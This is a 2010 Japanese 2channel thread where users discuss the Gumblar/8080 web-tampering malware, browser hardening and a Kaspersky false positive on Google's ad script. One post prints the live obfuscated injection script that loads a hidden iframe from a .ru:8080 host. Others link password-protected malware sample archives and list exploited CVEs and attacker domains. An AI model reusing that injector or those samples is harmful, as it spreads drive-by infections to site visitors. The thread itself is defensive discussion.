www●oygas●com
trueworldmedia●ru


582名無しさん@お腹いっぱい。:2010/01/24(日) 22:41:15
580は /*LGPL*/
581は /*Exception*/
583名無しさん@お腹いっぱい。:2010/01/24(日) 22:42:47
>>579
2kの俺はどうなる
変えたくても変えられないんだぞ
584名無しさん@お腹いっぱい。:2010/01/24(日) 22:51:32
2000ならFirefoxかOperaを使えばいいじゃないか。
IE6の使用は本当にIEじゃないと駄目なページにとどめるようにすればいい。
585名無しさん@お腹いっぱい。:2010/01/24(日) 22:59:08
>>580
whoisからめる
586名無しさん@お腹いっぱい。:2010/01/24(日) 23:00:44
>Windows2000
DEPが使えないのが痛すぎ・・・
587名無しさん@お腹いっぱい。:2010/01/24(日) 23:05:54
2行入れられてる

psk3●sakura●ne●jp/iv35/
Exception
trueworldmedia●ru

dp44016550●lolipop●jp/seikatuhogo/
Exception
cometruestar●ru

588名無しさん@お腹いっぱい。:2010/01/24(日) 23:06:16
DEPをあえて無効にしているおいらに隙はなかった(´・ω・) ス
589名無しさん@お腹いっぱい。:2010/01/24(日) 23:08:33
>>583
2K使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう
XPやVISTA、7にバージョンアップしない自分が悪い
590名無しさん@お腹いっぱい。:2010/01/24(日) 23:09:57
企業ほどIE6にこだわって入れたままにしてるとこ多いよね。
理由を聞くとセキュリティの都合で〜とか言う。
591名無しさん@お腹いっぱい。:2010/01/24(日) 23:10:40
>>584
普段使いは火狐だから大丈夫だと思ってたら、appleのソフトはバージョンアップ時に
強制的にIE立ち上げやがったぞ。
「IEは普段使いじゃないけど普段使いにする?」の画面が出てきて、止められなかった。
appleはIEでも火狐でも許可サイトには入れてなかったのに。

ここから本題。
慌ててIEは最高レベルにしたけど、立ち上げた瞬間に突く脆弱性って、コード実行能力
皆無のIEでもやられる?それとも大丈夫?

これが大丈夫でないなら、IEが完全削除できないWINでは、ゼロデイ突かれたら
終わりってことになる。
592名無しさん@お腹いっぱい。:2010/01/24(日) 23:19:00
>>581
whoisからめる
593名無しさん@お腹いっぱい。:2010/01/24(日) 23:20:51
からめる って何
594名無しさん@お腹いっぱい。:2010/01/24(日) 23:26:10
>>583
うちも2kだけど、2k用のIE6の修正パッチがms updateで配布されてるぞ適応したら?
595名無しさん@お腹いっぱい。:2010/01/24(日) 23:35:29
>>593
砂糖を煮詰めたお菓子だよ
596名無しさん@お腹いっぱい。:2010/01/24(日) 23:36:41
カラメルのおっちゃ〜ん
597名無しさん@お腹いっぱい。:2010/01/24(日) 23:38:03
>>583
2000でIE6でも22日のパッチを当てておけば現状ゼロディなんてないだろ。
Silverlightは2000だとWindows Updateには来ないみたいだからSilverlight公式に行かないと
アップデートできないけど。

というかさ、立ち上げた瞬間に突かれる脆弱性って具体的には何よ?
そんなもの見たことも聞いたこともないんだけど。

>>593
プリンの底にある黒い奴のこと。
598名無しさん@お腹いっぱい。:2010/01/24(日) 23:45:49
ttp://labs-uploader.sabaitiba.com/virus/download/1264344166.7z
PASS:virus
やあ (´・ω・`)  久しぶりに本体まとめを更新してみた
ブランクがあるので取りこぼしがあるだろう・・・
もう疲れたよ、パトラッシュ・・・
599名無しさん@お腹いっぱい。:2010/01/24(日) 23:53:53
>>598
乙です
ダウン開始直後いきなり反応して接続切られた・・・
600名無しさん@お腹いっぱい。:2010/01/24(日) 23:55:43
DEPは向こうにしちゃ駄目なんじゃあ…
601名無しさん@お腹いっぱい。:2010/01/24(日) 23:58:55
ttp://labs-uploader.sabaitiba.com/virus/download/1264344947.rar
PASS:virus

パスワードつけてなかった・・・orz
602名無しさん@お腹いっぱい。:2010/01/25(月) 00:00:25
>>593
テッちゃんのお友達の二人組
603名無しさん@お腹いっぱい。:2010/01/25(月) 00:05:09
sleipnirとIEって互換性あるらしいけど、IEを最新版にしてsleipnirも更新しとけば大丈夫?
604名無しさん@お腹いっぱい。:2010/01/25(月) 00:06:12
>>587
さくら
ろりぽ

でじろにめる逝かなかったみたい…
605名無しさん@お腹いっぱい。:2010/01/25(月) 00:06:22
いや、中身はIEだし
606名無しさん@お腹いっぱい。:2010/01/25(月) 00:08:07
>>603
大丈夫
プニルの開発もIEは最新にしてくれってアナウンスしてた
607名無しさん@お腹いっぱい。:2010/01/25(月) 00:12:08
>>606
それならよかった
今IE6から8にアップデートしたとこだ
そしたらjavaがねぇぞゴルァって言われた
608名無しさん@お腹いっぱい。:2010/01/25(月) 00:13:50
IE8にしてスレイプニル使ってるわ
感染はしたことない
スクリプトは切ってる
609名無しさん@お腹いっぱい。:2010/01/25(月) 00:20:36
IE7で改竄サイトにアクセスしたらJAVAもうごいたみたい。
610名無しさん@お腹いっぱい。:2010/01/25(月) 00:24:33
>>597
ルーターがなかったらやられるんじゃないの、立ち上げた瞬間に。
611名無しさん@お腹いっぱい。:2010/01/25(月) 00:27:20
>>608
スクリプトは切っておいたほうがいい?
612名無しさん@お腹いっぱい。:2010/01/25(月) 00:29:41
>>611
自分は切ってるよ
絵茶の時は絵茶専用に別のブラウザ立ち上げてる
613名無しさん@お腹いっぱい。:2010/01/25(月) 00:31:54
絵茶のサイトが感染したら・・・なんと恐ろしい・・・
614名無しさん@お腹いっぱい。:2010/01/25(月) 00:39:46
もしもニコニコのランキングページが感染したら…パンデミックにも程がある
615名無しさん@お腹いっぱい。:2010/01/25(月) 00:41:14
>>610
なるほど、ルーターなしの環境なあ。それは想定していなかったわ。
616名無しさん@お腹いっぱい。:2010/01/25(月) 00:44:28
ルーターなしの人は>>7やっとけば無問題。
617名無しさん@お腹いっぱい。:2010/01/25(月) 00:44:39
ニコニコもそうだけど、大手の2chコピペサイトが改ざんされたら被害がすごいだろうな。
618名無しさん@お腹いっぱい。:2010/01/25(月) 00:44:53
スクリプトブロックすると動画サイトとかまったく機能しなくなるからなぁ・・・・
信頼してるサイトが感染したらと思うと背筋が寒いぜ
619名無しさん@お腹いっぱい。:2010/01/25(月) 00:45:44
2ちゃんねるが!
改竄されたら!
620名無しさん@お腹いっぱい。:2010/01/25(月) 00:47:08
M$が!
改竄されたら!
621名無しさん@お腹いっぱい。:2010/01/25(月) 00:49:54
リネージュ公式が!
ハンゲー公式が!
官公庁のサイトが!

きりがないな
622名無しさん@お腹いっぱい。:2010/01/25(月) 00:52:07
自分でWhiteListに入れてるところが改竄されたらと重うと
623名無しさん@お腹いっぱい。:2010/01/25(月) 00:53:08
ルータつけてなくて>>7もやってないと実際どんな被害があるの?
ウイルス仕込まれたりデータごっそり流出?
624名無しさん@お腹いっぱい。:2010/01/25(月) 00:53:48
>>621
ネトゲの公式はどっかやられたことあったよ
625名無しさん@お腹いっぱい。:2010/01/25(月) 01:00:36
>>623
Gumblar、8080とはちと違う話だが
ttp://trendy.nikkeibp.co.jp/article/col/20050510/112145/
626名無しさん@お腹いっぱい。:2010/01/25(月) 01:02:27
懐かしいな、それ
627名無しさん@お腹いっぱい。:2010/01/25(月) 01:12:43
どうせ無防備PCの記事だろ・・と思ってクリックしたら予想通りだった
628名無しさん@お腹いっぱい。:2010/01/25(月) 01:13:37
ホワイトリストに登録するような中途半端なことするなら、全許可でも同じだと思うけどなあ。
629名無しさん@お腹いっぱい。:2010/01/25(月) 01:13:50
javaを有効にするの欄もクリアにしておいたほうがいいのかな?
630名無しさん@お腹いっぱい。:2010/01/25(月) 01:14:06
>>590
企業ではIE6のところが多いんじゃないかな。
とくに自社開発システムを使う大企業。
IE6はセキュリティの関係で使わざる得ない。7以上にするとセキュリティが高すぎて
業務システムが動かない。
631名無しさん@お腹いっぱい。:2010/01/25(月) 01:17:09
>>515
JREって保護モード対応してるから、Vista/7でIEを保護モード下で動かしてると、
JREの脆弱性を突かれてもシステムには影響ないんだよな

JREバグの検証コードで実験したけど、保護モードで動かしたときは大丈夫だった
632名無しさん@お腹いっぱい。:2010/01/25(月) 01:21:02
>>588
不具合の出る特定ソフトは
DEPの例外に登録すればいい気がするが・・・?
633名無しさん@お腹いっぱい。:2010/01/25(月) 01:24:55
>>575
普及率が高いものはターゲットになるから、普及率がひくけりゃ低いほど狙われにくい
だから、NetBSDとかOpenBSDとかだれも使ってないOSが安全
634名無しさん@お腹いっぱい。:2010/01/25(月) 01:28:16
DEPって標準では重要なシステムファイルのみってなってなかった?
おれは設定変更してすべてのプログラムで有効にしてる
635名無しさん@お腹いっぱい。:2010/01/25(月) 01:29:50
>>629
きちんとアップデートしておけば発動することはないんだから有効のままでいい。
たとえ発動しなくても引っかかること自体が嫌なら無効にすればいい。
636名無しさん@お腹いっぱい。:2010/01/25(月) 01:30:20
デフォがセキュアでも
ユーザーは穴開けまくる
637名無しさん@お腹いっぱい。:2010/01/25(月) 01:38:18
>>555
乙!

> Outlook Expressのメールすべてを…url…に送信する
そこんとこは「CVE-2008-2463」だお

SnapShot Viewerの SnapshotPath と CompressedPath と PrintSnapshotを
ごにょごにょすると、…url…が実行できちゃうみたいね

ついでだから感染したい人向けの環境書いとくよ

・MDAC(CVE-2006-0003)
 SP3より前のWindows XPで2006年4月の月例パッチを未適用に
・SnapShot Viewer(CVE-2008-2463)
 2008年8月の月例パッチ未適用の古いSnapShot Viewerをインストール
・Microsoft Video ActiveX Control(CVE-2008-0015)
 2009年7月のパッチ未適用のDirectShow(Windows)をインストール(デフォルト入ってる?)
・Adobe Reader
 8.1.2以下のVer.8→util.printf(CVE2008-2992)コース
 9.2.0にしる→newPlayer(CVE-2009-4324)コース
 7.1.0より前のVer.7→Collab.collectEmailInfo(CVE-2007-5659)コース
  Acrobat Script(ReaderのJavaScriptな)でバージョン分けしてるから、
  この3パターンのどれかしかだめだお
・JRE(CVE-2008-5353)
6 Update 11より前、5.0 Update 17より前 、1.4.2_19より前のJREのどれか

DEPの有効化やスクリプト無効化は禁止ね
うまく組み合わせないと好みの攻撃が受けられないから注意してね
感染チャンスは1日1回、IP変えないとはじかれちゃうぞ

ほかに足りないものある > all
638名無しさん@お腹いっぱい。:2010/01/25(月) 01:42:22
>>555>>637も乙
639名無しさん@お腹いっぱい。:2010/01/25(月) 02:10:39
GPLとLGPLとExceptionでPegel
640名無しさん@お腹いっぱい。:2010/01/25(月) 02:29:43
>>621
GENOの時には官公庁かなりやられたよ。
ライブカメラ持ちの国交省出先のは、一ヶ月前に見てたからぞっとした。
8080になってからはどうだったか忘れた。
641名無しさん@お腹いっぱい。:2010/01/25(月) 02:56:20
陥落したらまずいサイトってのは日本じゃ何をおいてもYahoo! JAPANトップだわな。
恐らく日本語サイトでは1日あたりのページビューが最も多いページ。

あそこがやられると、被害は「甚大」の一言で言い表せるものではなくなるだろう。

Yahoo! JAPANのセキュ担当、頼んだぞ!
642名無しさん@お腹いっぱい。:2010/01/25(月) 03:05:01
>>637みたく改めてリスト化されると、ここまで落とさないと感染できない事実に驚くわ。
643名無しさん@お腹いっぱい。:2010/01/25(月) 03:10:16
ここまで落とさなくとも感染はするぞw
644名無しさん@お腹いっぱい。:2010/01/25(月) 03:14:02
なんなの感染したい人向けって

気持ち悪(´・∀・`)

MじゃなくてGだね(^Д^)
645名無しさん@お腹いっぱい。:2010/01/25(月) 03:14:05
W7cw9590 = 'i^@c($)i!o(^-(u^(#!s@.)!!d#a^^u^(&&m&^!#.$#&$(n!!&e^)$$&t(&.!@&!o!c$n^!-&n#(e##-(#!#j!&$!p#@).!(c)^$!o#!^m(e@@&t)r()#u)&^e@s!^)t#()a#r!)^^.@r&u#'.replace(/\!|\$|&|#|\)|@|\(|\^/ig, '');
O1waipyz = document.createElement('if'+'rame');
O1waipyz.style.visibility = 'h!(#i^?d^@@d^^&e&^((n&)#'.replace(/\(|\$|#|&|@|\^|\)|\!/ig, '');
O1waipyz.src = 'http://'+W7cw9590+':8080/index.php?sc';
document.body.appendChild(O1waipyz);
646名無しさん@お腹いっぱい。:2010/01/25(月) 03:15:02
647名無しさん@お腹いっぱい。:2010/01/25(月) 03:31:51
直リンするなよ
648名無しさん@お腹いっぱい。:2010/01/25(月) 03:33:23
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/
649名無しさん@お腹いっぱい。:2010/01/25(月) 03:44:48
ガンブラーの目的は、ボットの分散ネットワークを作って何がしたいの?
650名無しさん@お腹いっぱい。:2010/01/25(月) 04:29:46
651650:2010/01/25(月) 04:31:21
すまん、誤爆した
652名無しさん@お腹いっぱい。:2010/01/25(月) 05:59:46
>>649
一気にどこかを攻撃
653名無しさん@お腹いっぱい。:2010/01/25(月) 06:25:19
日々新しい亜種が生まれてるのはわかるけど、このスレで既出の奴に感染していないかを調べるにはどうすればいい?
654名無しさん@お腹いっぱい。:2010/01/25(月) 06:32:10
>>653の補足:訪れるサイトではなく自分のパソコンの感染
655名無しさん@お腹いっぱい。:2010/01/25(月) 06:39:26
まずセーフモードで起動します。
656名無しさん@お腹いっぱい。:2010/01/25(月) 06:54:36
次に服を脱ぎます。
657名無しさん@お腹いっぱい。:2010/01/25(月) 06:59:42
そして呪文を唱えます。
658名無しさん@お腹いっぱい。:2010/01/25(月) 09:00:52
ふぁっく!おまいらそういうのばっかだな!
659名無しさん@お腹いっぱい。:2010/01/25(月) 09:29:38
>>7 の
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」

スタートアップの種類が、自動のまま動かせないのですが。
その下のRemote Procedure Call(RPC)Locatorは変えられます。
こちらを切っておけばよいのでしょうか?
660名無しさん@お腹いっぱい。:2010/01/25(月) 09:30:29
くっ!ガッツが足りない!
661名無しさん@お腹いっぱい。:2010/01/25(月) 11:16:50
http://nextxp.net/archives/2004/11/post_2.html
ここみたらRemote Procedure Callは絶対に自動ってあるけど
Remote Procedure Call(RPC)Locatorは手動ってあるし・・・
どうしよう
662名無しさん@お腹いっぱい。:2010/01/25(月) 11:26:07
>>630
そんな"セキュリティにこだわった"環境で、"ネットサーフィン"すんなよ、って話。
663名無しさん@お腹いっぱい。:2010/01/25(月) 12:47:34
>>618
スクリプトが直接悪さをしてるわけではないから、基本的な対策はしたうえで
火狐+RequestPolicy(アドオン)でスクリプト有効にして問題ないっぽい。

例えば581は以下のようになる(スクリプトON、RequestPolicy+Flashblock)
ttp://www.dotup.org/uploda/www.dotup.org592430.jpg.html

自分で許可したりホワイトリストに入ってなければ、大元のサイト以外へのアクセスはブロックされる。
で、画像のログの下から2番目のアクセス先があれなわけだw 長文失礼!
664名無しさん@お腹いっぱい。:2010/01/25(月) 12:50:24
みすったパス付きだった^^;こっちね↓
ttp://www.dotup.org/uploda/www.dotup.org592437.jpg.html
665名無しさん@お腹いっぱい。:2010/01/25(月) 13:01:03
>463
管理人にメール出した後も変化無しだったんで,
今朝AAA!CAFEに連絡したら,やっと改竄箇所が削除されてました。
トップページで告知してくれたらいいんだけど。
666名無しさん@お腹いっぱい。:2010/01/25(月) 13:03:13
>>567
連絡してやったら、Web製作費がリーズナブルだったから発注したそうだ

「お知らせ下さってありがとうございます お礼に家具をお安くいたします」とのことだったw
667名無しさん@お腹いっぱい。:2010/01/25(月) 13:09:51
金曜日に感染しました。

やたら、TM6.tmpだの、TM1A.tmpだの
通信をしたいとFWのポップアップがでるから
おかしいと思ってたら・・・。

TM6.tmp類の削除とレジストリからも消したのだが、
siszyd32.exeが見つからない。
と思ってたら、wwwpos32.exe でした。

FFFTPに何個か設定があったのですが、
今のところWebの改竄は確認できてません。、
TM6.tmpの通信をブロックしてたので、
情報は漏れなかったのかも?





668名無しさん@お腹いっぱい。:2010/01/25(月) 13:17:26
…と楽観視していてやられたサイトは沢山あるんじゃね。
htmlだけ見てたらjsやられてたとか単純に後回しにされてるとか。
669名無しさん@お腹いっぱい。:2010/01/25(月) 13:49:48
670名無しさん@お腹いっぱい。:2010/01/25(月) 14:12:21
>>480
いまは感染サイトは閉鎖されて、ブログ書き変わっているんだけど、

> 現在、
> 「カーポスト」「横浜陸事の代書屋」のホームページを
> 閉鎖しております。

> また、対策方法として下記の手続きを施します。
> 当事務所ホームページにより感染してしまわれた方には
> 大変ご迷惑をおかけいたしまして誠に申し訳ございません。
> FTPソフトを利用なさらない方には実害はないかも
> しれませんが、対応方法等を記載致します。

実害ないんだっけ???
671名無しさん@お腹いっぱい。:2010/01/25(月) 14:12:45
>>663
基本的な対策をしていればRequestPolicyなんて不要だろ。
そもそもログが不要ならRequestPolicyと同じことはFirefoxの本体機能だけで可能。
672名無しさん@お腹いっぱい。:2010/01/25(月) 14:16:16
>>669
マジで。今日いじったばっかりだったよ。
素人判断で迂闊に手出しちゃ駄目だなぁ。
673名無しさん@お腹いっぱい。:2010/01/25(月) 14:19:58
>>672
よかったねぇ、先に戻し方がわかって。
674名無しさん@お腹いっぱい。:2010/01/25(月) 14:31:44
RequestPolicyはガチガチにすると閲覧するときレイアウトくずすからなー
それにもっさり重くなるし
675名無しさん@お腹いっぱい。:2010/01/25(月) 14:36:57
>>672
再起動後に症状が出るはずだから、今のうちに必要な部分はテキスト保存しておけ
セキュリティソフトも立ちあがれなくなり、最悪ネットに接続することすらやばくなる
>>7コピペは次スレからどう扱うべきかね
676名無しさん@お腹いっぱい。:2010/01/25(月) 14:49:11
最悪OSリカバリーでも泣かない!超自己責任でやりたきゃやれ!
とかテンプレの頭とケツに行間空けて書いておくとか
677名無しさん@お腹いっぱい。:2010/01/25(月) 14:54:43
>>670

> 293 :名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:43
> 手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
> 全部IPが引けなくなってしまった

GNU GLP/LGPLのドメインが一掃されたみたいだから
21日までビンゴ、22日から実害なし…かな
678名無しさん@お腹いっぱい。:2010/01/25(月) 15:18:53
>>675
>>7 は統合セキュリティソフトやFirewallで閉じてるだろうから「いらない」に一票
正直セキュリティソフトも入れてないやつまで面倒見切れん
679名無しさん@お腹いっぱい。:2010/01/25(月) 15:30:28
痛いニュースが感染しているらしい。
誰か確認して〜。


124 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:14:53 ID:Klq45gB4
サイトがトロイの木馬に感染してる?

125 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:41:52 ID:ABVnF2MI
カスペル兄貴に怒られたよ

http://pc11.2ch.net/test/read.cgi/blog/1161013763/124-
680名無しさん@お腹いっぱい。:2010/01/25(月) 15:34:18
>>679
チェッカーじゃかからんがaguseでいったらTrojan.JS.Redirector.arだとさ
681名無しさん@お腹いっぱい。:2010/01/25(月) 15:34:49
tcupの掲示板のいたるところで
Trojan.JS.Redirector.arって出るんだが
これカスペの誤検出なのかな?
682名無しさん@お腹いっぱい。:2010/01/25(月) 15:35:14
Trojan.JS.Redirector.arが検出されました
683名無しさん@お腹いっぱい。:2010/01/25(月) 15:37:28
>>235
のサイト踏んじゃったんだけど…
オンラインスキャンで反応でなければセーフでしょうか
684名無しさん@お腹いっぱい。:2010/01/25(月) 15:41:43
もうどんなサイトも掲示板も安心できないこんな世の中じゃ
685名無しさん@お腹いっぱい。:2010/01/25(月) 15:42:25
ポイズン
686名無しさん@お腹いっぱい。:2010/01/25(月) 15:42:49
wikiwiki.jp感染してる?
687名無しさん@お腹いっぱい。:2010/01/25(月) 15:43:39
RRASってホームエディションは使えないんだっけ?
688名無しさん@お腹いっぱい。:2010/01/25(月) 15:44:47
>>681
aguseでいくとでるね
これなんだろう
689名無しさん@お腹いっぱい。:2010/01/25(月) 15:49:24
したらばなんてトップページでTrojan.JS.Redirector.ar出るし
690名無しさん@お腹いっぱい。:2010/01/25(月) 15:51:40
これ、アフィリエイトとか広告を誤検出してんじゃねぇの?
691名無しさん@お腹いっぱい。:2010/01/25(月) 15:52:20
ν速にスレ立ってるなw
692名無しさん@お腹いっぱい。:2010/01/25(月) 15:53:42
あちこち移動する度に「Trojan.JS.Redirector.ar」発見してカスペルスキーが怒るw
昨晩まで普通に見れたサイトばかりなんだが…
693名無しさん@お腹いっぱい。:2010/01/25(月) 15:55:16
なんか一気に感染広がってる感じがするなあ
694名無しさん@お腹いっぱい。:2010/01/25(月) 15:59:14
カスペ(笑)なら誤検出だろ
あそこゴミじゃんwwww
695名無しさん@お腹いっぱい。:2010/01/25(月) 15:59:29
>>691
うrl
696名無しさん@お腹いっぱい。:2010/01/25(月) 16:00:33
痛いニュースウイルス感染か?
http://tsushima.2ch.net/test/read.cgi/news/1264402100/
これか?
697名無しさん@お腹いっぱい。:2010/01/25(月) 16:00:40
GoogleのAdSenseに反応してるみたいだが
698名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:09
tp://pagead2.googlesyndication●com/pagead/show_ads.js

↑これじゃねぇの?って噂もあるみたいだけど
(こんなんその辺のサイトに埋め込まれまくりやん)

気力のある人はスクリプトを解析してみそwオレはごめんだがw
699名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:23
カスペだとひっかかるこれを誰かウィルストータルに送ってくれ
http://pagead2●googlesyndication●com/pagead/show_ads●js
700名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:45
googlesyndicationに反応してるのかね
誤検出ぽいなこれ
701名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:57
カスペ以外では何の問題もないんだから気にする必要はないな
702名無しさん@お腹いっぱい。:2010/01/25(月) 16:04:02
>>698
これを誤検出しているようじゃ行く先々でアラートの嵐だろうな。
703名無しさん@お腹いっぱい。:2010/01/25(月) 16:04:34
>>698-699
俺もそれだ。どう考えても誤検出だよなやっぱ
いちいち警告音鳴るのが凄く嫌だw
704名無しさん@お腹いっぱい。:2010/01/25(月) 16:05:09
>>698
これをトロイって検出してるな
したらば掲示板を初めそこらじゅうで検出されてうざくてたまらん
705名無しさん@お腹いっぱい。:2010/01/25(月) 16:06:27
グゥュエイイアアアアアアア!!!!

この音怖すぎ
706名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:10
カスペなんて使ってるからこうなるんだ
大人しくZEROとか使ってれば大丈夫
707名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:11
既に誰か投げてた

show_ads.js 1/40
http://www.virustotal.com/jp/analisis/250ea3d4d097c1ab23f4218e73cb8e3f72eed0e192fde86f4f81d3acc5812b34-1264402209

Kaspersky 7.0.0.125 2010.01.25 Trojan.JS.Redirector.ar
708名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:23
またカスペか・・・
709名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:50
>>706
冗談がお上手ね♪
710名無しさん@お腹いっぱい。:2010/01/25(月) 16:08:20
>>709
カスペよりZEROの方が優秀ってのは皆知ってます
711名無しさん@お腹いっぱい。:2010/01/25(月) 16:09:37
カスペルスカイって誤検出ばかりだな
712名無しさん@お腹いっぱい。:2010/01/25(月) 16:12:42
この30分で「Trojan.JS.Redirector.ar」のGoogleでのヒット数が0から10まで増えた
急上昇ワードの26位になってるw
713名無しさん@お腹いっぱい。:2010/01/25(月) 16:17:40
>>712
俺がググった時はこのスレがトップに出てきたわw

「Trojan.JS.Redirector.arって警告が出るぞ!」
「カスペがTrojan.JS.Redirector.ar検出してうるさいんだが」
「Trojan.JS.Redirector.arって何だ?」
「ググってみようぜ!」
「お、早速情報出てきた出てきた」
「…ってこれ俺達だし!!」
714名無しさん@お腹いっぱい。:2010/01/25(月) 16:20:26
さすがネラー
こういった情報だけは異様にはやいな
715名無しさん@お腹いっぱい。:2010/01/25(月) 16:20:31
カスユーザーざまぁ
716名無しさん@お腹いっぱい。:2010/01/25(月) 16:20:38
吹いたw
717名無しさん@お腹いっぱい。:2010/01/25(月) 16:25:24
>>678
>>7 はルータ使ってない人用って明記しとけばおk。
718名無しさん@お腹いっぱい。:2010/01/25(月) 16:32:53
カスペの検出は正しかったみたい
719名無しさん@お腹いっぱい。:2010/01/25(月) 16:33:35
>>718
冗談だろwww
俺のは全く反応してないぞww
720名無しさん@お腹いっぱい。:2010/01/25(月) 16:38:16
誤検出じゃなかったらGumblarの比ではないくらい広まってることになるなw
721名無しさん@お腹いっぱい。:2010/01/25(月) 16:38:43
どう考えても誤検出です。
722名無しさん@お腹いっぱい。:2010/01/25(月) 16:38:44
show_ads.js 最終的にこうなった
ttp://labs-uploader.sabaitiba.com/virus/download/1264405015.txt
723名無しさん@お腹いっぱい。:2010/01/25(月) 16:39:40
誤検出でなければググル先生がウンコ漏らすレベル
724名無しさん@お腹いっぱい。:2010/01/25(月) 16:40:06
誤検出じゃなけりゃ大惨事だなw
725名無しさん@お腹いっぱい。:2010/01/25(月) 16:40:53
>>718
カカスペの誤検知じゃないの?

ググって見るサイトのあっちこっちで、トトロイ続出なんだけど
726名無しさん@お腹いっぱい。:2010/01/25(月) 16:42:21
トトロイって何か可愛げやのうw
727名無しさん@お腹いっぱい。:2010/01/25(月) 16:43:20
カスペはこれだから駄目なんだよな
728名無しさん@お腹いっぱい。:2010/01/25(月) 16:43:48
グーグルアドセンスか何かのjsに反応してるから
あちこちのサイトで検出されてるんだろ。
誤検出じゃなかったらスゲーとは思うんだが、
いちいちうるさくて困る。
729名無しさん@お腹いっぱい。:2010/01/25(月) 16:45:33
>>723
漏らすね
730名無しさん@お腹いっぱい。:2010/01/25(月) 16:59:43
   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
トトロイ
(2010〜)
731名無しさん@お腹いっぱい。:2010/01/25(月) 17:02:14
>>730
かわええw
732名無しさん@お腹いっぱい。:2010/01/25(月) 17:02:33
仕事早いよw
733名無しさん@お腹いっぱい。:2010/01/25(月) 17:03:20
>>725は書写中枢障害の初期状態
734名無しさん@お腹いっぱい。:2010/01/25(月) 17:04:24
>>659
Remote Procedure Call とめたらOSさえ起動しなくなったり、
OS起動にめっちゃ時間がかかったり、ほとんどのアプリが動かなくなったりするよ

WindowsNTとかでは止めれたんだけど、止めて動かなくなるバカが増えたのか
いつのまにか標準UIからは止められなくなった
735名無しさん@お腹いっぱい。:2010/01/25(月) 17:04:37
トロイの検出ダイアログが一件に付き2つ出ることを表してるんじゃないの?
ダダイヤログって書くべきだったか。
736名無しさん@お腹いっぱい。:2010/01/25(月) 17:05:28
俺もトトロイ検出しねえかな
737名無しさん@お腹いっぱい。:2010/01/25(月) 17:06:51
トトロイはエロ動画を主食とします
738名無しさん@お腹いっぱい。:2010/01/25(月) 17:08:47
googleの広告を誤検知かよ
739名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:03
カスペ「googleはトロイ」
740名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:13
google先生のshow_ads.jsは誤検知だな
本当にgoogle先生がやらかしたら世界中大騒ぎだわ

ふだんadblockで広告とめてるから警告さえでなかった
741名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:33
>>669
ありがとうございます。
ポート番号「445」をいじったらオンラインにつながれなくなり
ばたばたしていてレスが遅れて申し訳ありません。

tp://soudan1●biglobe●ne●jp/qa3068747.html

ここからトロイ検出が出て少しびっくりしてしまいましたが、
誤検出?のようですね。
742名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:33
地球\(^o^)/オワタ
743名無しさん@お腹いっぱい。:2010/01/25(月) 17:12:33
googleアドセンス使ってるサイト全部ウイルス扱いかよw

カスペさん本気出したな
744名無しさん@お腹いっぱい。:2010/01/25(月) 17:13:24
トトロイの鳴き声は凶悪だなぁ
745名無しさん@お腹いっぱい。:2010/01/25(月) 17:13:57
グーグル先生を敵に回すと大変なことになっちまう
746名無しさん@お腹いっぱい。:2010/01/25(月) 17:14:24
怒ってグーグルが無料のアンチウイルスソフト作ったらおもろいんだが。
747名無しさん@お腹いっぱい。:2010/01/25(月) 17:17:12
google先生も難読化してるのか
748名無しさん@お腹いっぱい。:2010/01/25(月) 17:18:50
google先生のjsも、javascript使ってリダイレクトしてるから、
JS redirectorにはかわらないな
749名無しさん@お腹いっぱい。:2010/01/25(月) 17:19:07
>>746
それはむしろ作ってほしいな
750名無しさん@お腹いっぱい。:2010/01/25(月) 17:19:38
これでGoogleの検索結果からカスペ関連のサイトが消えたら面白いんだがなw
751名無しさん@お腹いっぱい。:2010/01/25(月) 17:19:40
google vs カスペ
最終決戦がはじまる
752名無しさん@お腹いっぱい。:2010/01/25(月) 17:20:51
よりによってgoogle先生にケンカを売るとは・・・
753名無しさん@お腹いっぱい。:2010/01/25(月) 17:22:19
google vs カスペとか決戦にならねえだろ
754名無しさん@お腹いっぱい。:2010/01/25(月) 17:22:46
>>741
うそー開いちゃったよー
755名無しさん@お腹いっぱい。:2010/01/25(月) 17:23:35
http://japan.cnet.com/news/sec/story/0,2000056024,20404879,00.htm
Google先生はAvast!を採用
カスペの時代は終わったね。
756名無しさん@お腹いっぱい。:2010/01/25(月) 17:26:45
Googleとカスペルスキー

\\ == \    __           _┌┐
 [ [_二二_\_/./∠勹ヽ   ロロロ\| |. ̄.「 ̄l\[ ̄|\
  | .| - ┌‐─‐┤∠   ∠几 _ .「= | = | [  勹..|  l   | .| |
  | .| ‐ │匸 ̄ |フ /  = 」|. |.|E= .|.=.」 |  勹.|  レ、 | .| |
 「 「 ‐ │×′く[,..、|フ = ∠|ノノ 匸 __コ/ [´ |__/. |__」 |
 レィ ̄凵 L/\\| .| .λ  |、_,,/|  凵 [_∧__/ 、__/\_/
. \_イ__∧_二二二λ二/   ¨\_,.‐‐‐^-‐′
757名無しさん@お腹いっぱい。:2010/01/25(月) 17:28:26
>>741
そっちかよw
もう>>7は次スレから不要に一票
手練は最初からわかって対処しているだろうし、下手に注釈つけても素人相手じゃどうしようもないわ
758名無しさん@お腹いっぱい。:2010/01/25(月) 17:28:28
まさにがっぷり四つ!
759名無しさん@お腹いっぱい。:2010/01/25(月) 17:29:41
